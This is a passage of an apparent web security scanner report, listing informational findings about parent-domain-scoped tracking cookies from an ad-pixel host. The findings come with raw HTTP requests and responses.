Set-Cookie: aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs

Response